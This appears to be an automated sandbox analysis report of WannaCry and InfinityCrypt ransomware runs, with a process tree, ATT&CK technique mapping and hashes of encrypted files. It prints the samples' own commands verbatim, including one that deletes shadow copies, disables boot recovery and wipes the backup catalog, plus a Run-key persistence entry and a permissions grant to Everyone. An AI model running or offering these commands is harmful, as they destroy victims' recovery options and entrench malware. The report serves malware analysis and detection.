"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7560 /prefetch:1
2⤵
PID:2816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9088 /prefetch:8
2⤵
- NTFS ADS
PID:3800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1
2⤵
PID:4696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
2⤵
PID:1520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,14625367734761256436,15072896576827241370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9124 /prefetch:8
2⤵
- NTFS ADS
PID:3856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2032

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4832 -ip 4832
1⤵
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1860 -ip 1860
1⤵
PID:244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2212 -ip 2212
1⤵
PID:1956

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5816

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004E0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5944

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2024

C:\Users\Admin\Downloads\WannaCrypt0r (1)\[email protected]
"C:\Users\Admin\Downloads\WannaCrypt0r (1)\[email protected]"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:7060

C:\Windows\SysWOW64\attrib.exe
attrib +h .
2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4048

C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5492

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 187681722710308.bat
2⤵
- System Location Discovery: System Language Discovery
PID:1508

C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
3⤵
- System Location Discovery: System Language Discovery
PID:6540

C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
2⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:6820

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected] co
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2340

C:\Users\Admin\Downloads\WannaCrypt0r (1)\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7132

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
2⤵
- System Location Discovery: System Language Discovery
PID:6232

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected] vs
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5064

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- System Location Discovery: System Language Discovery
PID:4644

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- System Location Discovery: System Language Discovery
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 264
4⤵
- Program crash
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 280
4⤵
- Program crash
PID:5524

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3892

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskse.exe
taskse.exe C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3128

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:5776

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mnmgcwodykunqun973" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCrypt0r (1)\tasksche.exe\"" /f
2⤵
- System Location Discovery: System Language Discovery
PID:4868

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mnmgcwodykunqun973" /t REG_SZ /d "\"C:\Users\Admin\Downloads\WannaCrypt0r (1)\tasksche.exe\"" /f
3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3500

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5812

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskse.exe
taskse.exe C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3444

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4784

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskse.exe
taskse.exe C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1540

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2684

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskse.exe
taskse.exe C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5972

C:\Users\Admin\Downloads\WannaCrypt0r (1)\@[email protected]
@[email protected]
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4428

C:\Users\Admin\Downloads\WannaCrypt0r (1)\taskdl.exe
taskdl.exe
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6632

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\@[email protected]
1⤵
PID:7064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5064 -ip 5064
1⤵
PID:5176

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5064 -ip 5064
1⤵
PID:6604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\LockSelect.xhtml
1⤵
PID:6080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7fff0db83cb8,0x7fff0db83cc8,0x7fff0db83cd8
2⤵
PID:5844

C:\Users\Admin\Downloads\InfinityCrypt\[email protected]
"C:\Users\Admin\Downloads\InfinityCrypt\[email protected]"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6604

C:\Users\Admin\Downloads\InfinityCrypt\[email protected]
"C:\Users\Admin\Downloads\InfinityCrypt\[email protected]"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
16B

MD5
6dcdcf66cc7ae826ebb4cdfbe93cc5e9

SHA1
561862a97f2b56644daf2e4d5b220f2028f9f15f

SHA256
5465514620fc419b5da461a39a2a65b7b226adfc39587181ee1f0a0f090b2f72

SHA512
d815044f8e077bd558f97cd1eb2dbc4bf424b6014b94198b1c8321db5e6e282cf05d7affbb9f908f414ed87196432b6ee4a6bb811c8dfb168d2b6074bd8d64ee

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
720B

MD5
77c107bd65a783713549601fd5d4d75e

SHA1
ac878d28d001e8ca0310d2614edf9f91ba90d25b

SHA256
361304a1c2ea723aafc6513d4c56a07d20a5eb69ab67729382a76dee841636fe

SHA512
5cc5e82f90c84f823517d7bbf535bddb75304e4547e79a192497a7d4e0a32b2901efbabf4bf7cce4f5a2820be648bf375a70658d7faa489808730d9623c464c3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
688B

MD5
4cc2adf0d605aa03c9db53cfdc96ac63

SHA1
47ca8baa924bd6777d31986b385f9de98c87fce0

SHA256
7bbea92ffcf5078f2d177d0adc9ed7e639c866dc90b3ced89d02e6eb56bb98ca

SHA512
743f786124f4dd8ea73c0cc86bb541c39c264097a6d17575e80893b7a2d7d5b48fccdabf8bc9387bc2db2e4f13239abe5b1860226b45e28a0e0b12204fb7cedf

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
1KB

MD5
a49c46050f096093758ed2472fe26e99

SHA1
64b54e17c95fbfd9fdb2c78d177d652fb915472e

SHA256
592868a76e4a0f25e81bb229d9c0ce01d15c174bc0770d08c9674fb46488ca46

SHA512
a66128082e004c0a2662f531d70bece76092bcc6b1b647c2f50e000d88624eec737539c4b7e3a9f778de010ad661076d621acaa23e1450105e47e1d0316e5679

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
448B

MD5
762fa6c65ffbde1a73aa002a869f214d

SHA1
560fff4791a2638445e89e097241e92701c98d62

SHA256
5ce3a5c2c4550fcf0bb20193447ae0aeeb719fd7b35145ea3ac3287988b42eb8

SHA512
2b96c6994c5bcad73d63a3ee3817eba2cb4379a397ee8f9eed8bce031743dc6d1316de5c5287eb51a46e8cae09c7a4007ca20293f82f379cbe79406b8a8bafa3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
624B

MD5
806d9b38a4c177c1e45e8f71427ae863

SHA1
f0c2eded456af7f10b45bd884ce10a46506f5a9c

SHA256
3be0cf99b5b9f03fac4d3038cdd1424c13f9304477e8a6fbdd853565f9809301

SHA512
9820842a6f0e38b35f26ead166b828dcc3425eaea25a8c8f2cdf5e4b12e2f1c77f2faf4002a8063ab02e1dca0846d3ec5d8583c3b4c39931ea3660d7e52a73a4

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
400B

MD5
e11c8bca323ca6bd0e9ec117002fffa2

SHA1
d239682678c930c50c008e9ef4ed7115e3659472

SHA256
b424f312251a48c89b48fa30423703fceb008f50cefc663e07cc5f1f5dff7d5d

SHA512
5148e6b1a2c82e73b7dd25395bac9e65f02ea18fadd1de4ba9a1ea15b052d2f74e6bf8b56b9573d875e30ee546d8f0f8c82f9fc9736d743d2ac73f59db509f09

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
560B

MD5
97e00e3768f2110d340e26dc91be1deb

SHA1
d2752b71f52de7681c1924ef207385350f8392e5

SHA256
b2345f36652a6b22ab23e02bbe9ac932ef08174592b509995f54bb28d3618393

SHA512
a5991bdaa6eda7d96744f94007ad7ba0f40a11acb2492cdd013c4ff23976e9d2f6be4862ea25bcff27a61ae7e10c43e38b60f174a3398464b111e971b139aed9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
400B

MD5
8520fa8dab71ad6ed83def5e802bea52

SHA1
15e4ec39fc53a471233dac0cbade91fd8e560ce7

SHA256
b659786df2a9087c8cacec2e62379bf09c5f6014b538947f67fb2aa871d39616

SHA512
86e021553cf078d53209bbde97f826ee1b5029326c69d8a2b1c771eb431192a28f0185e93f1d24bbbfcfde8d686764001392d3257621d4d29777c1800cea9207

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
560B

MD5
97e25083bc2b8965dde8f1f355393521

SHA1
8c00063825d5226c249ed4e31f0d0a1afb361ffd

SHA256
117f0a75d61f33e583ee69b8512e2e9a057f7410704897aea7fdf94942147cb1

SHA512
a2922ef29375b622639736815fb3d83d46da3f00e74bf850967dd2fe2b59a8fcbb6cd982c49409a0f25025a5f86eef310b07f295fc71b6ee6b206fe5298914ab

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
400B

MD5
b8c000ad1c8b93735516925562ea1779

SHA1
790d97eb33d5d958ba51733ed32d7de0646e47f5

SHA256
13675e7dacc0652745acf515875408aab7b8527280fa8ca0b9ffade3b5d2eb3f

SHA512
d716b36183e8521fcb5d14b5e71fac51771a708ea6defb7755f71ea50f329e1f5229ee78ac774a1640610f9e28e1edd626d1c4f3bcf218e0c045ffdb04e3cb6e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
560B

MD5
8c4b7093413a8b495385b05d42176ed2

SHA1
9a29dc0b0b9ebaddd24055bb546f8d66af33b5f4

SHA256
2f9a55a6ec68f9d46e60b783cdbacfecb481b700a121c28b625ec3ddfad25aed

SHA512
38bb49aab95ab546ff33b1137ce6782b9e99bc9d928137e80dd628ab73fc93fb677df1b203276177bc6ee2a08dca2de00af121c0702736d2647b03abfa6436bc

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
7KB

MD5
a88f3daaf1e1e89897b740cb67ffe78d

SHA1
4e79e691b9c720ca6ae2db0f96b726ffca8de3a1

SHA256
8c5aefe8041575e249d2c3f6e590d04266be173ee0fa702734583d999cfdfeb0

SHA512
189c2bf95bd44b574778b8b44bebbf120b85dbfd00eec742a4a85ca13bf2dabe204e9236596463f719196a1b167aa380ccfba39d7ce3a8a05e7589c1f3227ded

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
7KB

MD5
632227ff6f6a2c65ee2259bf001872a8

SHA1
c62cef1c3fcaf3f26d831873dd64748a17e4a5c7

SHA256
07af2fb1374745f513a533168a5ebfc49f2b5cdc562da2dadda5d502686813b8

SHA512
ae551963906c3050e633275798c0225e8f58484925e09f6691ae31bb2bc3c2ab197427fc280081c7b3e343abb9bd3c4f149f6f64b88e66225abe28ea2135522f

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_retina.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
15KB

MD5
9300c984dbade6b10429abcaa446fc10

SHA1
82838ff869b2e4737ec94a058eed0f13112fa098

SHA256
e33a48cd17b2aede4a6e07ee0ce67a1f172f07ee0bf48328f15a353931da36ca

SHA512
35ce59d0696e83aaae276a062c9dcee012fdb531aa1670f9c5b5091f3f6bb4103f6c2810f2ece91ea0ddd7d003b173273458f83f16d2c6def351dbcbaf694df5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
8KB

MD5
99aa3c03879f3b60282da864f16640eb

SHA1
98b4c03ef134cf95f4cf396fd7ec08c5a4bef358

SHA256
ed18c67202f611d89e5ead5b891700141db7e2e33e2692b63cdf77e427c06009

SHA512
795ee4f79ea71e00cb16a02644085d8fbe508443de86fc921ebe9e5e13d3f245df11f3562ddb2b358fb3706b125ed453b4e8cf07f76f6ecac6127db523e15cc1

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
17KB

MD5
6aa3dc9a94acbf691e1e88de3298df5e

SHA1
fb103aab893496a7ad35908e26eb83df0f9fba9c

SHA256
83e8f60f701726e0353669823c780f7bbf0e964c896a8ac72c1543417cfc4a54

SHA512
eebb3ccf25c61138945788be5c8d13c46f4099982f19c2beaccd96987ba612661c5c90a6acf96ca621323028a44b6f995747a2ed24fe869badb96fb4e6fa7320

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
192B

MD5
83a4538a95dc9225e374ed93cafeef31

SHA1
7d769f99d06186d3c81ac330c0824d63cf0ea88b

SHA256
d9529750f709978538772acfdb7af0d8ad8de74d3c80b5b059c54baa804ac929

SHA512
bc8e328d1030faac03b743d44ad3a5da2aa6d270ca8290f9db9d31e59d60c0d62c259db05d098d0e97cb3c48e8fe6863702f697b6bc0f7996cf90ec920fa50ac

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
704B

MD5
862229cb291556f4800d9529a4e86178

SHA1
84532adab27ff19d4f5a58d7cdfe2d2a26e9496c

SHA256
6ec81c9b31a8603dd23e2ecf6e22558f700598c6d74b69a27d89e635bbda3521

SHA512
453b6227fb66b72476eeba3cf0544497348503672dc65cffda6280f0050efffb0c7b0de2388a01afe4074b641f62646024c0ea2967169f3fbff1b2d8e4f70335

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
8KB

MD5
30aec314e2d7e109da402faf299163ed

SHA1
702bc90bd28584c2ed04fd895abef54c0f16cf58

SHA256
950c926c63cd8a9d4aaeb9eb94ceb19f1a6103684757ff84c02ae4313a930cb0

SHA512
7c71f2b87eeeb7fbcfecf5b7018f21d29e111acded9522902c216e209087c04d11156b8bcebf778899c6f1ec0fd795a3974424202dfb767b4450182767e6ad71

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
19KB

MD5
931f34de5dbbc9eae88b9387648d1d00

SHA1
2d4a343914f41a80a8e8dc80c579d924afc87fa2

SHA256
8884d693306aa57e13a62bce4257bd839636b290f573e9afec24b487402068d7

SHA512
932078d27b8fcf3a794e28f5b6bad0a8783a34077865d1a2993922a26e1e5d9dee511336c9c943aeda223a53e7492c6534902adc458f5f2ac37260ffc512a2d8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
832B

MD5
7877d6e2b30850a485af3c5ac4c41563

SHA1
e091388277bd72c1f334875b67cadf0dd54980b2

SHA256
62a10475c876be7bf5dbf995b4d920959c33b1bfaa8150ca3891f6a9a92ccbb3

SHA512
c35459d95c56692c64b7652cbbc167bfad0c62f1c916bc967346561633c3d935fe3c4504bae66cea8f985667060ab5cfae2f5a70ac7d4f79ecacefeac839c54e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ui-strings.js.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
1KB

MD5
6be1fa8825a8d32c7dacb22aa91ff866

SHA1
d8638cffbd6a0c394241ece1b2d218d5a2ff2ca7

SHA256
3d267ad0ad123367827653dfcd152fad13e9be7411b220cee7add8fd12970532

SHA512
8e75992a51aec8c8d7d7e5fecdbf22d88b6bead89005e7380a25f914c92a9cd492c151997f42c10df8119bfdfe2cac5883240b9dc822aa815e116308dbe2de10

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
32KB

MD5
2466d37ebba38d8da328b25b99762c7b

SHA1
f6a4e3181cebc5e48f626da4f7ad05ef857cfe50

SHA256
b32347eda9d7eb840e2f978bf0eeb682316f16945328216f40e3c10c715d2b75

SHA512
893ab52b6211a02b47b93f88addd9d4c5c5c1685d9a854e77015bb23baa1f6b55511b3f55d3c4680f30de20411d8f8a9d7f4311844715f209292089468523d97

Download Submit
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\msinfo32.exe.77F9C384CF5E79F229A631EFE08A1B685158261C3711026D85B5F60AB64D6521

Filesize
267KB

MD5
c30ea7db086149b1ee247795bb1b4fee

SHA1
f1e55df06865492c94e46b1bb628ffe2690d71b2

SHA256
31911a4ccf9da46d03ca1cc69f60dde9af00f57fe0409ad2930e6e1fc242f6cc

SHA512
76135c6eb44139702148b5ba2ab0e40e729fedc3079160e18385b1f8057aa97e8679c32b855e221254fba148787f278033f3138389614ac299bd9065e4147cf3

Download Submit
C:\Program Files\Common Files\System\symsrv.dll

Filesize
72KB

MD5
ccf7e487353602c57e2e743d047aca36

SHA1
99f66919152d67a882685a41b7130af5f7703888

SHA256
eaf76e5f1a438478ecf7b678744da34e9d9e5038b128f0c595672ee1dbbfd914

SHA512
dde0366658082b142faa6487245bfc8b8942605f0ede65d12f8c368ff3673ca18e416a4bf132c4bee5be43e94aef0531be2008746c24f1e6b2f294a63ab1486c

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e75ae0776967e3f0\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
7119cee8c52ce1ca22890ca45bebba27

SHA1
a8292fd51a05a8d6697db3dbb5a15a743019a019

SHA256
53178bac0a9f65e4f9a5c5a29dec03d0d34a048aaed4fa8625b68004725bcdeb

SHA512
197fd9a7cff0127cdbf3769bd1ec3c0f97f28782e6569f71484d0d459d313c057472b38a94f79b96ca6e5a4ca698c59ad25a929912a641e758f3561480600fcf

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e75ae0776967e3f0\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e75ae0776967e3f0\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
976B

MD5
5da7aad8df6342db4528ce16b4f4e467

SHA1
08917ed58cc5bfdfdf2a34de4275356affdf2d2c

SHA256
690c594920f91b28ca311b79af9888c924db3b4fd31f3eb7e480045749b65307

SHA512
